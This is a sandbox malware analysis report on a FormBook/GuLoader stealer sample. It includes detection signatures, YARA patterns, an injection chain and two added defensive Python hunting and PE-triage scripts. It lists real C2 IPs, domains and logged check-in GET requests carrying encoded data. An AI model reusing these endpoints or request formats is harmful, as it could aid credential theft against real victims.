
Windows Analysis Report
Quotation.exe

Overview

General Information

Sample Name: Quotation.exe
Analysis ID: 830618
MD5: 8a81948116d2ea79bee1d261733dba89
SHA1: 5cf4113debe6d37bd770d8d3870647b8bac082a3
SHA256: 5a64a3fd65f7176b7ad623893e3cb573af13eb51850f8243a1951884eee757a9

Detection

FormBook, GuLoader
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Yara detected GuLoader
Snort IDS alert for network traffic
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Initial sample is a PE file and has a suspicious name
Writes to foreign memory regions
Tries to detect Any.run
Performs DNS queries to domains with low reputation
Injects a PE file into a foreign process
Yara detected Generic Downloader
Queues an APC in another process (thread injection)
Modifies the context of a thread in another process (thread injection)
Found potential ransomware demand text
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
One or more processes crash
May sleep (evasive loops) to hinder dynamic analysis
Contains functionality to shutdown / reboot the system
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Contains functionality to dynamically determine API calls
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
PE file does not import any functions
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Checks if the current process is being debugged
Binary contains a suspicious time stamp
PE / OLE file has an invalid certificate
PE file contains more sections than normal
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to read data from the clipboard

Classification

  • System is w10x64native
  • Quotation.exe (PID: 4952 cmdline: C:\Users\user\Desktop\Quotation.exe MD5: 8A81948116D2EA79BEE1D261733DBA89)
    • Quotation.exe (PID: 7972 cmdline: C:\Users\user\Desktop\Quotation.exe MD5: 8A81948116D2EA79BEE1D261733DBA89)
      • explorer.exe (PID: 4712 cmdline: C:\Windows\Explorer.EXE MD5: 5EA66FF5AE5612F921BC9DA23BAC95F7)
        • control.exe (PID: 8020 cmdline: C:\Windows\SysWOW64\control.exe MD5: 4DBD69D4C9DA5AAAC731F518EF8EBEA0)
          • firefox.exe (PID: 2836 cmdline: C:\Program Files\Mozilla Firefox\Firefox.exe MD5: FA9F4FC5D7ECAB5A20BF7A9D1251C851)
            • WerFault.exe (PID: 7616 cmdline: C:\Windows\system32\WerFault.exe -u -p 2836 -s 284 MD5: 5C06542FED8EE68994D43938E7326D75)
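The tree above is the whole infection chain in one picture: Quotation.exe launches a second copy of itself (the child that gets hollowed), that copy starts a fresh explorer.exe, the injected explorer.exe runs a 32-bit system binary from SysWOW64 (control.exe), and control.exe reaches into firefox.exe, which then crashes into WerFault. The same explorer.exe is the process that talks to the C2 hosts in the Networking section. The following hunt is an added example, not code from the Joe Sandbox report: PROCESSES and CONNECTIONS are constructed from this tree and from the explorer.exe "Network Connect" rows below, the record shape (pid, ppid, image, destination ip/port) is an assumption about what a Sysmon or EDR export provides, and the fan-out threshold is a tuning choice of this example.

```python
"""Hunting the injection chain shown in this report's process tree.

Added example, not code from the Joe Sandbox report. PROCESSES and CONNECTIONS
are constructed from the report's process tree and "Network Connect" rows; the
record layout is an assumed Sysmon/EDR export, not a real product schema.
"""
from collections import defaultdict

PROCESSES = [  # constructed from the report's process tree (PIDs as listed there)
    {"pid": 4952, "ppid": 1,    "image": "C:\\Users\\user\\Desktop\\Quotation.exe"},
    {"pid": 7972, "ppid": 4952, "image": "C:\\Users\\user\\Desktop\\Quotation.exe"},
    {"pid": 4712, "ppid": 7972, "image": "C:\\Windows\\Explorer.EXE"},
    {"pid": 8020, "ppid": 4712, "image": "C:\\Windows\\SysWOW64\\control.exe"},
    {"pid": 2836, "ppid": 8020, "image": "C:\\Program Files\\Mozilla Firefox\\Firefox.exe"},
    {"pid": 7616, "ppid": 2836, "image": "C:\\Windows\\system32\\WerFault.exe"},
]

CONNECTIONS = [  # constructed from the report's explorer.exe "Network Connect" rows
    (4712, "91.184.0.24", 80), (4712, "45.194.145.38", 80), (4712, "199.192.26.35", 80),
    (4712, "217.160.0.217", 80), (4712, "154.215.156.6", 80), (4712, "34.117.168.233", 80),
]

BROWSERS = {"firefox.exe", "chrome.exe", "msedge.exe", "iexplore.exe"}
SHELLS = {"explorer.exe"}


def _basename(image):
    return image.rsplit("\\", 1)[-1].lower()


def find_injection_chain(processes, connections, min_dst_ips=3):
    """Return (rule, pid, detail) findings for the hops seen in this report:
    self-spawn (hollowing prelude), explorer.exe parented by a user binary,
    explorer.exe -> SysWOW64 binary -> browser, and explorer.exe HTTP fan-out."""
    by_pid = {p["pid"]: p for p in processes}
    children = defaultdict(list)
    for p in processes:
        children[p["ppid"]].append(p)
    findings = []

    for p in processes:
        parent = by_pid.get(p["ppid"])
        if parent is None:
            continue
        name, parent_image = _basename(p["image"]), parent["image"].lower()
        # Rule 1: a binary starting a second copy of itself, the usual prelude to
        # hollowing the (suspended) child and resuming it with foreign code.
        if parent_image == p["image"].lower():
            findings.append(("self_spawn", p["pid"], p["image"]))
        # Rule 2: explorer.exe is started by userinit.exe at logon; an instance
        # whose parent lives under C:\Users is a fresh, attacker-created one.
        if name in SHELLS and parent_image.startswith("c:\\users\\"):
            findings.append(("shell_spawned_by_user_binary", p["pid"], parent["image"]))
        # Rule 3: shell -> 32-bit system binary from SysWOW64 -> browser, the hop
        # a 32-bit stealer needs to land inside a browser and harvest from it.
        if _basename(parent["image"]) in SHELLS and "\\syswow64\\" in p["image"].lower():
            for child in children[p["pid"]]:
                if _basename(child["image"]) in BROWSERS:
                    findings.append(("wow64_hop_to_browser", p["pid"], child["image"]))

    # Rule 4: the shell itself talking HTTP to many distinct servers
    # ("System process connects to network" in the signature list).
    dst_by_pid = defaultdict(set)
    for pid, ip, port in connections:
        if port in (80, 443):
            dst_by_pid[pid].add(ip)
    for pid, ips in dst_by_pid.items():
        proc = by_pid.get(pid)
        if proc and _basename(proc["image"]) in SHELLS and len(ips) >= min_dst_ips:
            findings.append(("shell_http_fanout", pid, sorted(ips)))
    return findings


if __name__ == "__main__":
    for finding in find_injection_chain(PROCESSES, CONNECTIONS):
        print(finding)
```

Each rule on its own is noisy (installers self-spawn, explorer.exe restarts happen); the point of running all four over one tree is that the sample trips every hop in sequence, which no benign installer does.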
No configs have been found
Yara matches, dropped files:
  Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Delforliget\Melotragedy\Lindhardt\System.dll
    Rule: JoeSecurity_GenericDownloader_1 (Yara detected Generic Downloader), author: Joe Security

Yara matches, memory dumps:
  Source: 0000000D.00000002.26407368880.0000000002F10000.00000004.00000800.00020000.00000000.sdmp
    Rule: JoeSecurity_FormBook_1 (Yara detected FormBook), author: Joe Security
    Rule: Formbook_1 (autogenerated rule brought to you by yara-signator), author: Felix Bilstein - yara-signator at cocacoding dot com
      • 0x180e5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x17b81:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x181e7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1835f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xaa1a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x16dcc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x1de67:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ee1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    Rule: Windows_Trojan_Formbook_1112e116 (description unknown), author unknown
      • 0x1f0b0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xae4f:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x182e7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
  Source: 0000000A.00000002.22726446861.0000000000060000.00000040.10000000.00040000.00000000.sdmp
    Rule: JoeSecurity_FormBook_1 (Yara detected FormBook), author: Joe Security
    Rule: Formbook_1 (autogenerated rule brought to you by yara-signator), author: Felix Bilstein - yara-signator at cocacoding dot com
      • 0x180e5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x17b81:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x181e7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1835f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xaa1a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x16dcc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0x1de67:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ee1a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
  (11 further memory-dump matches are not included in this extract)
        No Sigma rule has matched
Snort IDS alerts (all TCP; every alert is classtype "A Network Trojan was detected"; SIDs 2031412, 2031449 and 2031453 are the ET TROJAN FormBook CnC Checkin (GET) rules listed under Networking):

        Timestamp                 Source               Destination         Protocol  SID
        03/20/23-15:06:08.714083  192.168.11.20:49916  2.57.90.16:80       TCP       2031449
        03/20/23-15:02:43.756679  192.168.11.20:49888  199.192.26.35:80    TCP       2031412
        03/20/23-15:06:08.714083  192.168.11.20:49916  2.57.90.16:80       TCP       2031412
        03/20/23-15:02:43.756679  192.168.11.20:49888  199.192.26.35:80    TCP       2031453
        03/20/23-15:03:18.139935  192.168.11.20:49897  34.117.168.233:80   TCP       2031453
        03/20/23-15:03:18.139935  192.168.11.20:49897  34.117.168.233:80   TCP       2031412
        03/20/23-15:06:08.714083  192.168.11.20:49916  2.57.90.16:80       TCP       2031453
        03/20/23-15:02:43.756679  192.168.11.20:49888  199.192.26.35:80    TCP       2031449
        03/20/23-15:03:18.139935  192.168.11.20:49897  34.117.168.233:80   TCP       2031449


        AV Detection

        Source: Quotation.exe | VirusTotal: Detection: 18%
        Source: Quotation.exe | ReversingLabs: Detection: 25%
        Source: Yara match | File source: 0000000D.00000002.26407368880.0000000002F10000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000A.00000002.22726446861.0000000000060000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000D.00000002.26404151531.00000000027A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000D.00000002.26407116465.0000000002EE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: Yara match | File source: 0000000A.00000002.22726706444.0000000000090000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
        Source: 12.2.explorer.exe.13773814.0.unpack | Avira: Label: TR/Patched.Ren.Gen
        Source: 13.2.control.exe.4dd3814.3.unpack | Avira: Label: TR/Patched.Ren.Gen
        Source: 14.2.firefox.exe.129e3814.0.unpack | Avira: Label: TR/Patched.Ren.Gen
        Source: Quotation.exe | Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
        Source: unknown | HTTPS traffic detected: 162.240.73.101:443 -> 192.168.11.20:49854 version: TLS 1.2
        Source: Quotation.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
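The two "Static PE information" rows above deserve a second look together: the COFF characteristics say RELOCS_STRIPPED while the DLL characteristics say DYNAMIC_BASE. DYNAMIC_BASE only takes effect if the loader can relocate the image, and with the relocation table stripped it cannot, so the sample opts into ASLR on paper and runs at its fixed image base in practice. The same header parse also answers the signature-list items "PE file does not import any functions", "PE file contains sections with non-standard names", "PE file contains more sections than normal" and "Binary contains a suspicious time stamp". The following triage routine is an added example, not code from the Joe Sandbox report: build_sample_pe() constructs a minimal PE32 header set in memory carrying the flag values the report lists, but its section names, section count, timestamp and the "more sections than normal" threshold are assumptions of this example, since the report does not print them.

```python
"""Static PE header triage for the characteristics listed in this report.

Added example, not code from the Joe Sandbox report. build_sample_pe() builds a
minimal PE32 header set with the flags the report lists for Quotation.exe; the
section names, section count and timestamp are invented here, and the
"too many sections" threshold is an assumption of this example.
"""
import struct
import time

# IMAGE_FILE_* (COFF Characteristics) and IMAGE_DLLCHARACTERISTICS_* bits.
FILE_FLAGS = {
    0x0001: "RELOCS_STRIPPED", 0x0002: "EXECUTABLE_IMAGE",
    0x0004: "LINE_NUMS_STRIPPED", 0x0008: "LOCAL_SYMS_STRIPPED",
    0x0100: "32BIT_MACHINE", 0x2000: "DLL",
}
DLL_FLAGS = {
    0x0040: "DYNAMIC_BASE", 0x0100: "NX_COMPAT",
    0x0400: "NO_SEH", 0x8000: "TERMINAL_SERVER_AWARE",
}
STANDARD_SECTIONS = {".text", ".rdata", ".data", ".rsrc", ".reloc", ".idata",
                     ".edata", ".bss", ".tls", ".pdata", ".CRT"}
MAX_NORMAL_SECTIONS = 6      # assumption; the sandbox's own threshold is not published here
EPOCH_2000 = 946684800       # link timestamps before 2000 are treated as forged


def _names(mask, table):
    return [name for bit, name in table.items() if mask & bit]


def triage(data, now=None):
    """Parse a PE32 image's headers and return the checks a triage analyst wants first."""
    if data[:2] != b"MZ":
        raise ValueError("missing MZ header")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    (_machine, nsections, timestamp, _symtab, _nsyms,
     opt_size, chars) = struct.unpack_from("<HHIIIHH", data, coff)
    opt = coff + 20
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("only PE32 (32-bit) images are handled here")
    dllchars = struct.unpack_from("<H", data, opt + 70)[0]
    ndirs = struct.unpack_from("<I", data, opt + 92)[0]
    # Data directory 1 is the import table; an all-zero entry means the image
    # imports nothing by name ("PE file does not import any functions").
    import_rva, import_size = (struct.unpack_from("<II", data, opt + 96 + 8)
                               if ndirs > 1 else (0, 0))
    sec_tbl = opt + opt_size
    names = [data[sec_tbl + 40 * i:sec_tbl + 40 * i + 8].rstrip(b"\0").decode("latin-1")
             for i in range(nsections)]
    now = int(time.time()) if now is None else now
    relocs_stripped = bool(chars & 0x0001)
    aslr_requested = bool(dllchars & 0x0040)
    return {
        "characteristics": _names(chars, FILE_FLAGS),
        "dll_characteristics": _names(dllchars, DLL_FLAGS),
        "relocs_stripped": relocs_stripped,
        "aslr_requested": aslr_requested,
        # DYNAMIC_BASE needs a relocation table to act on; with relocations
        # stripped the loader cannot rebase the image, so ASLR does not apply.
        "aslr_effective": aslr_requested and not relocs_stripped,
        "no_imports": import_rva == 0 or import_size == 0,
        "section_names": names,
        "nonstandard_sections": [n for n in names if n not in STANDARD_SECTIONS],
        "too_many_sections": nsections > MAX_NORMAL_SECTIONS,
        "timestamp": timestamp,
        "suspicious_timestamp": timestamp < EPOCH_2000 or timestamp > now + 86400,
    }


def build_sample_pe(section_names=(".text", ".rdata", ".data", ".rsrc", ".tls", "4Uz1", "kqLm"),
                    timestamp=0x7FFFFFF0,                        # constructed: far in the future
                    chars=0x0001 | 0x0002 | 0x0004 | 0x0008 | 0x0100,   # flags from the report
                    dllchars=0x0040 | 0x0100 | 0x0400 | 0x8000,         # flags from the report
                    import_dir=(0, 0)):
    """Constructed minimal PE32 header set (DOS stub, COFF, optional header, section table)."""
    e_lfanew = 0x80
    dos = (b"MZ" + b"\0" * 58 + struct.pack("<I", e_lfanew)).ljust(e_lfanew, b"\0")
    opt_size = 0xE0                                   # PE32 optional header, 16 directories
    coff = struct.pack("<HHIIIHH", 0x14C, len(section_names), timestamp, 0, 0, opt_size, chars)
    opt = bytearray(opt_size)
    struct.pack_into("<H", opt, 0, 0x10B)             # Magic: PE32
    struct.pack_into("<H", opt, 70, dllchars)         # DllCharacteristics
    struct.pack_into("<I", opt, 92, 16)               # NumberOfRvaAndSizes
    struct.pack_into("<II", opt, 96 + 8, *import_dir)  # import directory (RVA, size)
    secs = b"".join(struct.pack("<8s32x", n.encode("ascii")) for n in section_names)
    return dos + b"PE\0\0" + coff + bytes(opt) + secs


if __name__ == "__main__":
    for key, value in triage(build_sample_pe()).items():
        print(f"{key:22} {value}")
```

Run it over a real sample by passing the file's bytes to triage(); the "aslr_effective" flag is the one to read first, since a fixed-base 32-bit image with no import table and odd section names is the profile of a packed loader rather than of a normal installer.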
        Source: Binary string: /_/artifacts/obj/manual.System/net6.0-Release/System.pdbSHA256n source: Quotation.exe, 00000001.00000003.21488348129.00000000029CD000.00000004.00000020.00020000.00000000.sdmp, System.dll0.1.dr
        Source: Binary string: maintenanceservice.pdb@ 0%P% source: Quotation.exe, 00000001.00000003.21491594910.00000000029C8000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.1.dr
        Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Cryptography.X509Certificates\net6.0-windows-Release\System.Security.Cryptography.X509Certificates.pdb source: Quotation.exe, 00000001.00000003.21487073637.0000000004F8F000.00000004.00000020.00020000.00000000.sdmp, System.Security.Cryptography.X509Certificates.dll.1.dr
        Source: Binary string: mshtml.pdb source: Quotation.exe, 0000000A.00000001.21847480465.0000000000649000.00000020.00000001.01000000.00000005.sdmp
        Source: Binary string: System.Security.Cryptography.X509Certificates.ni.pdb source: Quotation.exe, 00000001.00000003.21487073637.0000000004F8F000.00000004.00000020.00020000.00000000.sdmp, System.Security.Cryptography.X509Certificates.dll.1.dr
        Source: Binary string: /_/artifacts/obj/manual.System/net6.0-Release/System.pdb source: Quotation.exe, 00000001.00000003.21488348129.00000000029CD000.00000004.00000020.00020000.00000000.sdmp, System.dll0.1.dr
        Source: Binary string: control.pdb source: Quotation.exe, 0000000A.00000003.22724188827.00000000331A1000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22725360518.00000000331C4000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000002.22757544824.0000000002F80000.00000040.10000000.00040000.00000000.sdmp
        Source: Binary string: wntdll.pdbUGP source: Quotation.exe, 0000000A.00000002.22771863781.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22626322501.00000000331AA000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000002.22771863781.000000003362D000.00000040.00001000.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22633102338.0000000033352000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22731766422.00000000048C7000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22726401565.000000000471E000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000002.26409217218.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, control.exe, 0000000D.00000002.26409217218.0000000004B9D000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: E:\Builds\221\N2\HO_SE_g_2016_r_0\Sources\SolutionExplorer\target\nar\bin\x86-Windows-msvc\release\SolutionExplorerCLI.pdb source: Quotation.exe, 00000001.00000003.21484407403.00000000029C1000.00000004.00000020.00020000.00000000.sdmp, SolutionExplorerCLI.dll.1.dr
        Source: Binary string: wntdll.pdb source: Quotation.exe, Quotation.exe, 0000000A.00000002.22771863781.0000000033500000.00000040.00001000.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22626322501.00000000331AA000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000002.22771863781.000000003362D000.00000040.00001000.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22633102338.0000000033352000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22731766422.00000000048C7000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22726401565.000000000471E000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000002.26409217218.0000000004A70000.00000040.00001000.00020000.00000000.sdmp, control.exe, 0000000D.00000002.26409217218.0000000004B9D000.00000040.00001000.00020000.00000000.sdmp
        Source: Binary string: control.pdbUGP source: Quotation.exe, 0000000A.00000003.22724188827.00000000331A1000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000003.22725360518.00000000331C4000.00000004.00000020.00020000.00000000.sdmp, Quotation.exe, 0000000A.00000002.22757544824.0000000002F80000.00000040.10000000.00040000.00000000.sdmp
        Source: Binary string: mshtml.pdbUGP source: Quotation.exe, 0000000A.00000001.21847480465.0000000000649000.00000020.00000001.01000000.00000005.sdmp
        Source: Binary string: maintenanceservice.pdb source: Quotation.exe, 00000001.00000003.21491594910.00000000029C8000.00000004.00000020.00020000.00000000.sdmp, maintenanceservice2.exe.1.dr
        Source: Binary string: firefox.pdb source: control.exe, 0000000D.00000003.22905560816.000000000771A000.00000004.00000020.00020000.00000000.sdmp, control.exe, 0000000D.00000003.22957867486.0000000007D72000.00000004.00000020.00020000.00000000.sdmp
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 1_2_004062DD FindFirstFileA,FindClose,
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 1_2_004057A2 GetTempPathA,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,LdrInitializeThunk,FindNextFileA,FindClose,
        Source: C:\Users\user\Desktop\Quotation.exe | Code function: 1_2_00402765 FindFirstFileA,
        Source: C:\Users\user\Desktop\Quotation.exe | File opened: C:\Users\user
        Source: C:\Users\user\Desktop\Quotation.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Windows
        Source: C:\Users\user\Desktop\Quotation.exe | File opened: C:\Users\user\AppData\Local
        Source: C:\Users\user\Desktop\Quotation.exe | File opened: C:\Users\user\AppData\Local\Microsoft
        Source: C:\Users\user\Desktop\Quotation.exe | File opened: C:\Users\user\AppData
        Source: C:\Users\user\Desktop\Quotation.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache

        Networking

        Source: C:\Windows\explorer.exe | Network Connect: 91.184.0.24:80
        Source: C:\Windows\explorer.exe | Network Connect: 45.194.145.38:80
        Source: C:\Windows\explorer.exe | Network Connect: 199.192.26.35:80
        Source: C:\Windows\explorer.exe | Network Connect: 217.160.0.217:80
        Source: C:\Windows\explorer.exe | Network Connect: 154.215.156.6:80
        Source: C:\Windows\explorer.exe | Network Connect: 34.117.168.233:80
        Source: C:\Windows\explorer.exe | Network Connect: 81.17.18.196:80
        Source: C:\Windows\explorer.exe | Network Connect: 23.83.160.9:80
        Source: C:\Windows\explorer.exe | Network Connect: 208.91.197.91:80
        Source: C:\Windows\explorer.exe | Network Connect: 81.17.29.148:80
        Source: C:\Windows\explorer.exe | Network Connect: 88.212.206.251:80
        Source: C:\Windows\explorer.exe | Network Connect: 2.57.90.16:80
        Source: C:\Windows\explorer.exe | Network Connect: 172.67.212.220:80
        Source: C:\Windows\explorer.exe | Network Connect: 198.58.118.167:80
        Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49888 -> 199.192.26.35:80
        Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49888 -> 199.192.26.35:80
        Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49888 -> 199.192.26.35:80
        Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49897 -> 34.117.168.233:80
        Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49897 -> 34.117.168.233:80
        Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49897 -> 34.117.168.233:80
        Source: Traffic | Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49916 -> 2.57.90.16:80
        Source: Traffic | Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49916 -> 2.57.90.16:80
        Source: Traffic | Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.11.20:49916 -> 2.57.90.16:80
        Source: DNS query: www.dexmart.xyz
        Source: Yara match | File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Ghetto\Delforliget\Melotragedy\Lindhardt\System.dll, type: DROPPED
        Source: Joe Sandbox View | ASN Name: HOSTNETNL
        Source: Joe Sandbox View | ASN Name: DXTL-HKDXTLTseungKwanOServiceHK
        Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
        Source: global traffic | HTTP traffic detected: GET /d91r/?z4=iC4EpsnjqAMsGvgWFbn+fContgVXGATBB72AUlNsZB8RnX0iaYC7Rjz9cHXMA4a3u8hdEGRv958fgJWC172SOiEaLo/g5aJ7NA==&6SE=F8zFuLn HTTP/1.1 | Host: www.interactive-media.ru | Connection: close | Data Raw: 00 00 00 00 00 00 00
        Source: global traffic | HTTP traffic detected: GET /d91r/?z4=xFjwo0xAzcGZMdvEtWe8dg3SOJilBZCwp4DaoNJ0mT1+16DKJdlGz7oyHXjYsyYKd34SXU2gi60PXCcIQ24pa/hNG6+rBSLNTw==&6SE=F8zFuLn HTTP/1.1 | Host: www.cardinialethanol.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
        Source: global traffic | HTTP traffic detected: GET /d91r/?z4=5uELbA0g21s84RfIYZefn7jmwGm7oIOOLOAnPy0CEmjl7E2osw+P2nrFQVa8XPAXlQFWR1Kf++ZUi1OuENtNpjpnS7NncHgQqw==&6SE=F8zFuLn HTTP/1.1 | Host: www.flaviosilva.online | Connection: close | Data Raw: 00 00 00 00 00 00 00
        Source: global traffic | HTTP traffic detected: GET /d91r/?z4=7PV8upFW6FVa3k/MU+30mMAjyxriZ1cDX5oDGeg3AZSuSXraG6qqoVat6TxNWaSRWOEFtjNQc54wQIQLn7Ha+8c9lg+BGW9hdg==&6SE=F8zFuLn HTTP/1.1 | Host: www.solya-shop.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
        Source: global traffic | HTTP traffic detected: GET /d91r/?z4=mm2yDWovojsq98EVpVvEejLaRDawKnKNjB2g4hWos3CUrPXkYcC/p+nLjVs5nQU/dkGDVZ/wRxzIeHsnSgbyBomSUgQTl++E/Q==&6SE=F8zFuLn HTTP/1.1 | Host: www.buymyenergy.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
        Source: global traffic | HTTP traffic detected: GET /d91r/?z4=QRVitphc0g1OIlGqribmuO+/vkIwz3nmW5e0zmbI+ptVqgaVXv4o34I8PAy9Ptw3AL0LuNtl4GkWhRdrmVn9ER/XiJFNsBOU8g==&6SE=F8zFuLn HTTP/1.1 | Host: www.184411.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
        Source: global traffic | HTTP traffic detected: GET /d91r/?z4=A3xSHk+fyI7su/grjjiR7vS7+2q1W7vJyDCiqNYDPcjU2Prp7aaot61k+Logkh61BwiUEQE66B2EoDKGsTYBbPn+5VOUdQAbGQ==&6SE=F8zFuLn HTTP/1.1 | Host: www.b-tek.media | Connection: close | Data Raw: 00 00 00 00 00 00 00
        Source: global traffic | HTTP traffic detected: GET /d91r/?z4=mny6VZKrhd/9NKVuKuT/s/SGWqKgSQU06gLLPmpyieItdUR08ut5ldoEEciwTOIy3aXJmehMaME22hMIN/PsdP4yT3Vly6kaHw==&6SE=F8zFuLn HTTP/1.1 | Host: www.dexmart.xyz | Connection: close | Data Raw: 00 00 00 00 00 00 00
        Source: global traffic | HTTP traffic detected: GET /d91r/?z4=eODNz5pw0nGnv4SFyTaum/5/t7nqNWp+9hyyxvutUEIaFJ9+iSImfL8MjMj4uhwzobeFgf5ptQiqPWHvQt8dHyNKhUrdKKLp8Q==&6SE=F8zFuLn HTTP/1.1 | Host: www.maxhaidt.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
        Source: global traffic | HTTP traffic detected: GET /d91r/?z4=9I8nCmGbZhqNwxnuseOoBgVoo3mEoWGWlq2S/FO71IXVKobHlwQLLDq9ejz9WGKrhGOo7OtXutt8bUbRiDDVGcEjYwCLb2KUDQ==&6SE=F8zFuLn HTTP/1.1 | Host: www.ghostdyes.net | Connection: close | Data Raw: 00 00 00 00 00 00 00
        Source: global traffic | HTTP traffic detected: GET /d91r/?z4=PMnnsBn+KIOLN/VfOifa/NU1HKCRW97HYgMDorQQf0wo2T3aBqzEKnmyN0lZa7FB9krY/amKEMrac7kP3KvtrQL60DCopbH9IA==&6SE=F8zFuLn HTTP/1.1 | Host: www.aznqmd.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
        Source: global traffic | HTTP traffic detected: GET /d91r/?z4=Cz7EdLoZVVVFkl6Al85Fq2yKknQr9MrL8MY+iTrjKvcqeI67VNXHoBdgAYm0xOpsMAVI5pfYswEw4evz8uHbKlZcCugzfDdIKQ==&6SE=F8zFuLn HTTP/1.1 | Host: www.texasgent.com | Connection: close | Data Raw: 00 00 00 00 00 00 00
